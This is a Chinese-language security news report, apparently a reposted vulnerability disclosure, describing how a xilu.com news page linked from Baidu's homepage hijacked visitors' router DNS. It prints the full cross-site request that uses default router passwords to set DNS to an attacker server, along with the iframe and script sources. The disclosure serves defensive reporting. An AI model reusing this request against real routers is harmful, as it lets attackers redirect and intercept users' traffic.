频道栏目
首页 > 资讯 > 网站安全 > 正文

西陆网(xilu.com)利用百度首页新闻劫持用户本地路由器DNS

13-11-02        来源:[db:作者]  
收藏   我要投稿
今天通过百度新版首页,访问西陆网的一条新闻后,发现本地路由器DNS被劫持为121.157.39.111。于是具体分析了一下劫持的过程。
由于是百度首页推荐的新闻,影响人群应该不小。报告给百度,是希望百度把这个垃圾网站踢出百度新闻源,免得祸害人呀
 
1、在百度首页,访问了一条 “赵红霞真实照片”的新闻。
 
网页地址 http://shizheng.xilu.com/20130917/1000010000094910.html
 
 
2、通过firebug分析,发现页面包含了如下链接。
 
 
http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=121.157.39.111&dnsserver2=114.114.114.114&Save=%B1%A3+%B4%E6
 
多次访问发现admin:admin,会变化,例如admin:123456,也就是利用路由器默认密码不断尝试修改路由器dns为121.157.39.111、114.114.114.114。
 
通过Referer可以看出,这个修改dns的链接来源于http://gz.dagushu.com/center.html。
 
 
 
3、切换firebug到html,发现以框架形式包含了http://gz.dagushu.com/center.html
4、最终存在弱口令的路由器dns被修改。整个劫持过程完成。
 
 

 
补充:进一步分析,发现恶意代码通过
 
<script src="http://newspage.xilu.com/model/xilu_bottom.js" type="text/javascript" language="JavaScript"> 引入,属于西陆网的域名,可见其有一定的主观故意。
 
修复方案:
把西陆网踢出百度新闻源
相关TAG标签
上一篇:微信有可能如何通过朋友圈做移动端的搜索引擎?
下一篇:新浪微人脉存储型XSS漏洞(长度限制绕过)与越权双剑合并
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站